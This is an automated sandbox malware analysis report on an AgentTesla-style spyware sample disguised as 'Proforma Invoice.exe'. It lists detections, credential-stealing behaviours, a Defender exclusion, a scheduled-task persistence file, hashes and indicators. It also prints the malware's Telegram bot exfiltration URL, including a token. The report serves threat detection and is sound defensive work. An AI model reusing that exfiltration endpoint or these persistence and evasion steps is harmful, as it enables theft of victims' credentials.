Sample: Proforma Invoice.exe
Startdate: 18/07/2022
Architecture: WINDOWS
Score: 100

Signatures on the start node:
• Snort IDS alert for network traffic
• Malicious sample detected (through community Yara rule)
• Multi AV Scanner detection for dropped file
• 16 other signatures

Process tree:
• Proforma Invoice.exe (started)
  Dropped: C:\Users\user\AppData\...\ebJpPhiwjcAviB.exe, PE32
  Dropped: C:\...\ebJpPhiwjcAviB.exe:Zone.Identifier, ASCII
  Dropped: C:\Users\user\AppData\Local\...\tmp8D30.tmp, XML
  Dropped: C:\Users\user\...\Proforma Invoice.exe.log, ASCII
  Signature: Adds a directory exclusion to Windows Defender
  • Proforma Invoice.exe (started)
    DNS/IP: api.telegram.org 149.154.167.220, 443, 49781, 49785 TELEGRAMRU United Kingdom
    DNS/IP: 192.168.2.1 unknown unknown
    Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Signature: Tries to steal Mail credentials (via file / registry access)
    Signature: Tries to harvest and steal ftp login credentials
    Signature: Tries to harvest and steal browser information (history, passwords, etc)
  • powershell.exe (started)
    • conhost.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)

Submitted file

Source | Detection | Scanner | Label | Link
Proforma Invoice.exe | 31% | Virustotal | | Browse
Proforma Invoice.exe | 37% | Metadefender | | Browse
Proforma Invoice.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
Proforma Invoice.exe | 100% | Joe Sandbox ML | |

Dropped files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe | 37% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

Unpacked PE files

Source | Detection | Scanner | Label | Link | Download
8.2.Proforma Invoice.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
8.0.Proforma Invoice.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
8.0.Proforma Invoice.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
8.0.Proforma Invoice.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
8.0.Proforma Invoice.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
8.0.Proforma Invoice.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://a7Yu7sNuvhjH4U.com | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
https://api.ipify.org%%startupfolder% | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
https://api.telegram.org4 | 0% | URL Reputation | safe |
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
https://api.ipify.org% | 0% | URL Reputation | safe |
https://api.telegram.orgD8 | 0% | URL Reputation | safe |
http://api.eve-central.com/api/marketstat | 0% | URL Reputation | safe |
http://api.eve-central.com/api/marketstatIDon | 0% | Avira URL Cloud | safe |
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe |
http://a7Yu7sNuvhjH4U.comx | 0% | Avira URL Cloud | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://eve.no-ip.de/prices/30d/ | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://crl.micro | 0% | URL Reputation | safe |
http://eIoKIh.com | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://api.eve-online.com/ | 0% | URL Reputation | safe |
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument | false | | high
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://a7Yu7sNuvhjH4U.com | Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000003.453167723.0000000001254000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643016652.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org%%startupfolder% | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | low
http://www.goodfont.co.kr | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4 | Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org% | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://api.telegram.orgD8 | Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.eve-central.com/api/marketstat | Proforma Invoice.exe | false | URL Reputation: safe | unknown
http://api.eve-central.com/api/marketstatIDon | Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://code.google.com/p/com232term | ebJpPhiwjcAviB.exe.0.dr | false | | high
http://a7Yu7sNuvhjH4U.comx | Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://eve.no-ip.de/prices/30d/ | Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | Proforma Invoice.exe, 00000008.00000002.647093535.0000000006865000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://eIoKIh.com | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/ | Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocumentdocument----- | Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://github.com/riuson/com232term | ebJpPhiwjcAviB.exe.0.dr | false | | high
http://api.eve-online.com/ | Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr | false | URL Reputation: safe | unknown
Contacted public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false

Contacted private IPs

IP
192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 668067
Start date and time: 2022-07-18 10:23:18 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Proforma Invoice.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/10@2/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 1.4% (good quality ratio 1.1%)
• Quality average: 63.6%
• Quality standard deviation: 33.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 71
• Number of non-executed functions: 29
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Time | Type | Description
10:24:39 | API Interceptor | 598x Sleep call for process: Proforma Invoice.exe modified
10:24:47 | API Interceptor | 42x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection
149.154.167.220 | DcoqBSYDmM_orim4.0may2.js | malicious
 | kEXGPQVxaG_orim4.0may2.js | malicious
 | Ordern.no291521.exe | malicious
 | fortnite loader .exe | malicious
 | SecuriteInfo.com.Trojan.PackedNET.1449.860.exe | malicious
 | Formul#U00e1rio de pagamento.exe | malicious
 | bQQHP9ciRL.exe | malicious
 | Sales Contract.exe | malicious
 | zmFxPdjpEM_orim4.0may2.js | malicious
 | JHnOCHtlWn.exe | malicious
 | oMzQjy3OqW.exe | malicious
 | Purchase Order 1.doc | malicious
 | Purchase Order 2.doc | malicious
 | SecuriteInfo.com.W32.AIDetectNet.01.6187.exe | malicious
 | 20220714.exe | malicious
 | MKzkRUNb2P.exe | malicious
 | SecuriteInfo.com.Variant.Lazy.220312.8792.exe | malicious
 | PO.js | malicious
 | SecuriteInfo.com.W32.AIDetectNet.01.3709.exe | malicious
 | SecuriteInfo.com.W32.AIDetectNet.01.29916.exe | malicious
Match | Associated Sample Name / URL | Detection | Context
api.telegram.org | DcoqBSYDmM_orim4.0may2.js | malicious | 149.154.167.220
 | XZjqkRq0O5.exe | malicious | 149.154.167.220
 | kEXGPQVxaG_orim4.0may2.js | malicious | 149.154.167.220
 | F2m0cKfVAV.exe | malicious | 149.154.167.220
 | viBbVXDLHd.exe | malicious | 149.154.167.220
 | Ordern.no291521.exe | malicious | 149.154.167.220
 | fortnite loader .exe | malicious | 149.154.167.220
 | Axmn81ncqB.exe | malicious | 149.154.167.220
 | SecuriteInfo.com.Trojan.PackedNET.1449.860.exe | malicious | 149.154.167.220
 | Formul#U00e1rio de pagamento.exe | malicious | 149.154.167.220
 | bQQHP9ciRL.exe | malicious | 149.154.167.220
 | Sales Contract.exe | malicious | 149.154.167.220
 | zmFxPdjpEM_orim4.0may2.js | malicious | 149.154.167.220
 | JHnOCHtlWn.exe | malicious | 149.154.167.220
 | oMzQjy3OqW.exe | malicious | 149.154.167.220
 | Purchase Order 1.doc | malicious | 149.154.167.220
 | Purchase Order 2.doc | malicious | 149.154.167.220
 | SecuriteInfo.com.W32.AIDetectNet.01.6187.exe | malicious | 149.154.167.220
 | 20220714.exe | malicious | 149.154.167.220
 | MKzkRUNb2P.exe | malicious | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Context
TELEGRAMRU | DcoqBSYDmM_orim4.0may2.js | malicious | 149.154.167.220
 | 4opYwyuphU.exe | malicious | 149.154.167.99
 | 94FBD83A3AB8CEFA4864FA9D969D5C8B27DBE121CB0B5.exe | malicious | 149.154.167.99
 | EzIB2Sn73D.exe | malicious | 149.154.167.99
 | tcznSskQbx.exe | malicious | 149.154.167.99
 | zr47ihfIo3.exe | malicious | 149.154.167.99
 | Avast Premium Security crack.exe | malicious | 149.154.167.99
 | a.exe | malicious | 149.154.167.99
                                                                                                  setup.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  SecuriteInfo.com.Trojan.PWS.Steam.31455.11067.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  GjfOB98ZZx.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  NceSvLupCz.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  C2BLjRGYWr.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  QeTI24e25Q.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  kEXGPQVxaG_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E65Jn7N2og.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  38zspo3ygQ.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  JuWK51esuy.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  Ordern.no291521.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fortnite loader .exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDcoqBSYDmM_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DHL.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DENUNCIA VIRTUAL POR FALSIFICACION DE DOCUMENTO.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  launch.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  zara.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Universal Steam Software by Amfi - [Cracked by 03 & iVally].exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  #U044f.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  obfuscated.vmp_protected.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ExitLag_.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  6288a1de5a1db_30593f.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  cheat.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  o9o8Y7hb8P.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  kEXGPQVxaG_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  imi5VDr4W0.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Ordern.no291521.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fortnite loader .exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  BrawlStars.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DriverlessEAC.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Stealer.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E20920A7259CABE4F4BBEF5BF983181AD47FB8C075D7F.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  No context
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1402
                                                                                                  Entropy (8bit):5.336840028142602
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko8l:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzX
                                                                                                  MD5:334734FEF0BE6E3826004710EBCF7891
                                                                                                  SHA1:F4B3F06B3B2C9B95C973FBDE86A11BF4B08D7071
                                                                                                  SHA-256:ACED9D81BAA81C6C745072292E4B501F26309653EE318B0823183ABD9B51BBE0
                                                                                                  SHA-512:426D9A4D8C3A84969EDB528E17E1FED0C79526BBA4372D0650F9A04BFC60B8A793CA1C96D759A040EE03E29DCCAEE573DFFEB98BC2F113B5C8530BB125AC5F75
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22272
                                                                                                  Entropy (8bit):5.60190524695232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KtCDe0+VTCD5ZESI5SBKnYjultI+X7Y9g9SJ3xOT1Ma7ZlbAV74wiZBDI+iyE:nDjS4KYClthD9cUCafwIVs
                                                                                                  MD5:86C4A227C4D869A2BE66CF6D61FC20F0
                                                                                                  SHA1:6219C43447A14CD9A39A9F9D8CA3536151BCF758
                                                                                                  SHA-256:93D3DF1CB161FEF87BE4940EC9DEC1B4CB0E862EFEB711746C384AE24B4E6ECB
                                                                                                  SHA-512:00B9D25EDBCF3EC45F423CFAFAC2A051266EC5B03D057EB80BA2BA0D16029FBEB95395FB0F2D0DC97D8B0D3038274058BE0BD4BF1CB1DC3FDDB578B29D60F951
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:1
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1613
                                                                                                  Entropy (8bit):5.124055198955844
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL4xvn:cgea6YrFdOFzOzN33ODOiDdKrsuTUv
                                                                                                  MD5:9B768330FF7E87787B67395058434C5C
                                                                                                  SHA1:D292244F2F519E1A56D6E31713F1102392FFE79A
                                                                                                  SHA-256:6991984684CB56ABD1B207772DEFD79157D6D1543631D53A79C01D23052BA1E7
                                                                                                  SHA-512:59FBB6F025F0E0AA087F63EE9803E2054B57E3400FF39EC734F01F86724BD423D03FC452FBF979BAAA01DD73DBC9EF7F9E285701F7821584F20746BEEC00E249
                                                                                                  Malicious:true
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailab
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):1681
                                                                                                  Entropy (8bit):4.65463587053992
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:crr7HKs7HqlDMEAnM/3Jn6UyLEAn+/TELe:ur7Z7KdZAnkJnigAnM0e
                                                                                                  MD5:0A211DC1DDB25EA8DE763A50AC2B84ED
                                                                                                  SHA1:A4EC9B02A3CB4DFB2A8D17A4D4519940D1E65D3F
                                                                                                  SHA-256:1306138CC76C95715A56E2074AD8371F3477FD2E576ACDB756F638E70553AB56
